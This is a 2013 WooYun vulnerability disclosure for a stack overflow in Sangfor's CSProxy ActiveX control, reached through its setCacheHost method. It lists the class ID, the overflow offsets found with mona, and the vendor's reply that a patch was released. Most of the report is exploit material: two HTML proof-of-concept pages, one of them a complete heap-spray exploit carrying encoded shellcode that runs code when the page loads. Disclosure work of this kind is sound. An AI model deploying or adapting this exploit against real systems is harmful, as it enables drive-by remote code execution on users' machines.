当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042986

漏洞标题:#3 Sinfor CSProxy Class Activex Remote Code Execution

相关厂商:深信服

漏洞作者: 想要减肥的胖纸

提交时间:2013-11-15 13:55

修复时间:2014-02-13 13:56

公开时间:2014-02-13 13:56

漏洞类型:远程代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-15: 细节已通知厂商并且等待厂商处理中
2013-11-15: 厂商已经确认,细节仅向厂商公开
2013-11-18: 细节向第三方安全合作伙伴开放
2014-01-09: 细节向核心白帽子及相关领域专家公开
2014-01-19: 细节向普通白帽子公开
2014-01-29: 细节向实习白帽子公开
2014-02-13: 细节向公众公开

简要描述:

Looking for cyclic pattern in memory
EIP overwritten with lower pattern : 0x6a61326a (offset 277)
ECX overwritten with lower pattern : 0x6a61326a (offset 277)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad18c overwritten with lower pattern : 0x6a61326a (offset 273), followed by 4 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad07d : Contains lower cyclic pattern at ESP+0x435 (+1077) : offset 2, length 259 (-> 0x016ad17f : ESP+0x538)
0x016ad185 : Contains lower cyclic pattern at ESP+0x53d (+1341) : offset 266, length 15 (-> 0x016ad193 : ESP+0x54c)
0x016ad199 : Contains lower cyclic pattern at ESP+0x551 (+1361) : offset 286, length 7714 (-> 0x016aefba : ESP+0x2373)

详细说明:

名称:         CSProxy Class
发行者: Sinfor Technologies Co.,Ltd
类型: ActiveX 控件
版本: 4. 2. 1. 3
文件日期:
上次访问日期: 2013年11月15日,13:03
类 ID: {53EC2F48-968E-4A42-B99B-9F6571474213}
使用计数: 765
阻止次数: 0
文件: ProxyIE.dll
文件夹: C:\Program Files\Sinfor\SSL\ClientComponent3


setCacheHost提交大于276个字符之后溢出
mona计算的偏移

+] Looking for cyclic pattern in memory
EIP overwritten with lower pattern : 0x6a61326a (offset 277)
ECX overwritten with lower pattern : 0x6a61326a (offset 277)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad18c overwritten with lower pattern : 0x6a61326a (offset 273), followed by 4 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad07d : Contains lower cyclic pattern at ESP+0x435 (+1077) : offset 2, length 259 (-> 0x016ad17f : ESP+0x538)
0x016ad185 : Contains lower cyclic pattern at ESP+0x53d (+1341) : offset 266, length 15 (-> 0x016ad193 : ESP+0x54c)
0x016ad199 : Contains lower cyclic pattern at ESP+0x551 (+1361) : offset 286, length 7714 (-> 0x016aefba : ESP+0x2373)


0x033829b7 msvcrt._strlwr把字符转成小写 所以mona计算的偏移可能不准确

漏洞证明:

<html>
<head>
<title>Sangfor Activex overflow PoC</title>
</head>
<!--
0x033829b7 msvcrt._strlwr把字符转成小写
-->
<body>
<object classid="clsid:53EC2F48-968E-4A42-B99B-9F6571474213" id='poc'></object>
<script>
junk1 = "";
while(junk1.length < 276) junk1+="A";
eip = "DDDD";
payload = junk1 + eip;
poc.setCacheHost(payload);
</script>
</body>
</html>


DDDD被转换成dddd 覆盖eip 见下图

QQ20131115-5@2x.png


<html>
<title>Sangfor Activex overflow PoC</title>


<object classid='clsid:53EC2F48-968E-4A42-B99B-9F6571474213' id='target' ></object>
<script >
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var bigblock = unescape('%u\9090%u\9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 500; i++){ memory[i] = block + shellcode }
junk1 = "";
while(junk1.length < 276) junk1+="C";
eip = "\x0c\x0c\x0c\x0c";
payload = junk1 + eip;
target.setCacheHost(payload);
</script>
</html>


修复方案:

版权声明:转载请注明来源 想要减肥的胖纸@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-11-15 17:23

厂商回复:

亲,跟你上次提交的属同类问题。补丁包已发,这台估计还没升级。

最新状态:

暂无